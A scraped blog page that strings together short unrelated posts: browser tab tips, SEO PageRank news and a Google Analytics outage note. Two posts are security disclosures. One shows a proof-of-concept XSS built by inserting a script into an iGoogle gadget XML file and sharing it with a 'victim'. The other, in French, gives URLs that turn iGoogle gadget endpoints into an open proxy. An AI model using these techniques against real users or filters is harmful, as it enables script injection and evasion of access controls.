devquotes,

In the goal to be harder better faster geeker than ever, this article will help you absolve your incompleteness and your total lack of ingenuity.

With your multi-touch keyboard so you’ll know that holding down the shift or control key when you click on the tabs, they will then be grouped into a single selection with the obvious aim to assemble crowds for more tame.

Selection with control of my favorite sites:

Selection with shift:

Pin / to favorites / close:

Admit that it is horny.

iGoogle is a service of Google. Its features include the capability to add web feeds a personalized homepage. Google also allows all users to create a special gadget.

1. Write crafted gadget
2. Submit crafted gadget
3. Share it
4. Exploit it !

Then, we go …

1. Write crafted gadget

I’ve get the “Google News” gadget by downloading the following XML file:

http://www.gstatic.com/ig/modules/tabnews/kennedy/tabnews.xml

and added my <script> at the end like this :

…
ud=K.getString(x),vd=K.getMsg(x),wd=/\.cn$/.test(location.host);wd||!ud||ud==vd?pd():sd(ud); window.updateCustomEdit=kd;window.saveConfig=td;window.hideSettingsBlock=jd;})()</script>
<script>alert(/XSS by @MaKyOtOx/);</script>
<div id=settings_mask onclick="return false;"></div>
<div id=settings_block>
<div id=settings_content></div>
</div>
</Content></Module>

2. Submit crafted gadget

I’ve uploaded my xml here: http://www.makyoto.fr/xss/poc.xml

Then, once I’ve customized my gadget, I’ve submitted it here: http://www.google.com/ig/submit

No error was found in the crafted XML file, so it’s OK, my poc.xml is ready to be used as a gadget ^^

3. Share it

Easy to share with friends this gadget using the official sharing features. The following links can be sent to the victim:

http://www.google.com/ig/adde?moduleurl=www.makyoto.fr/xss/poc.xml%253C&source=imag

or

http://www.google.com/ig/directory?type=gadgets&url=www.makyoto.fr/xss/poc.xml

If you choose to add my gadget, a widget will be now present in the iGoogle dashboard.

4. Exploit it !

You are bad guys …

Google Security Team answered me “the domain in which the feature is hosted – gmodules.com – is specifically meant as a compartmentalized « sandbox » for various types of potentially unsafe, user-controlled content. This domain is isolated from any sensitive content due to the same-origin policy.”

Yes, they’re right because I cannot access to user auth cookies, but I can render and script what I want in the gadget … And, what if an attacker can access to popular gadgets XML files ?

Nevertheless I continue to believe that there is vulnerability because the XML file isn’t sufficiently sanitized before being processed.

Tweets are welcome @MaKyOtOx and @devquotes

Il existe plusieurs façons d’utiliser les sites de Google comme proxies HTTP :

• Utiliser la page de traduction de sites : http://www.google.com/translate?langpair=en|fr&u=www.site_interdit.xxx
• Utiliser la page pour obtenir la version mobile d’un site : http://www.google.com/gwt/n?u=http%3A%2F%2www.site_interdit.xxx
• Utiliser le cache Google : (bah tu cliques …)
• Utiliser Google Docs et notamment la fonction IMPORTDATA() : voir http://www.antoniorinaldi.it/use-google-spreadsheet-as-a-proxy/

Il existe au moins deux autres manières d’utiliser Google comme proxy, et ce en passant au travers des gadgets dédiés au portail iGoogle. Ces deux méthodes sont accessibles sans authentification préalable :

PoC#1 : http://www.ig.gmodules.com/gadgets/proxy/container=ig&gadget=http%3A%2F%2Fgoogle.com/http://www.site_interdit.xxx
(oui oui, la fin de la payload est étrange mais c’est normal)
PoC#2 : http://www.ig.gmodules.com/gadgets/makeRequest?httpMethod=GET&container=ig&url=http%3A%2F%2Fwww.site_interdit.xxx

Pour les 2 PoC, un fichier « p.txt » sera téléchargé. Il s’agit de la réponse votre requête.

L’équipe sécu de Google a été contactée ; elle considère qu’il s’agit d’une « by design feature ». Quelques limitations d’utilisation ont été mises en place comme la restriction aux protocoles HTTP(S) et un jeu de ports définis.

Comments are welcome !

Hey SEO dudez,

little SEO news: Google is updating PR on all their DC (Data Center). Most of my own sites PR have changed. Can we tell this precious indicator is back?

« Precious » you said? Many people are saying they don’t care about PR. But difference between a PR1 page and PR5 is HUGE! No one cares but everyone wants one :)

For the moment, have a check on: http://www.seocentro.com/tools/search-engines/pagerank-dc.html (old tool but working tool).

Here is a list of working Google DC. Let us know about your PR update in the comments, do your sites have been granted?

The more testimonies we’ll have the better we’ll be able to discuss about.

First article for a « bad » news.

This 3rd november 2010, Google Analytics decided to take some holidays. Mostly all my statistics are not working, my visits counter are downright null this morning.

Thought I had a problem on my servers but it wasn’t and there are still no news from Google Analytics Blog at the moment, 12:30 pm.

Read the rest of this entry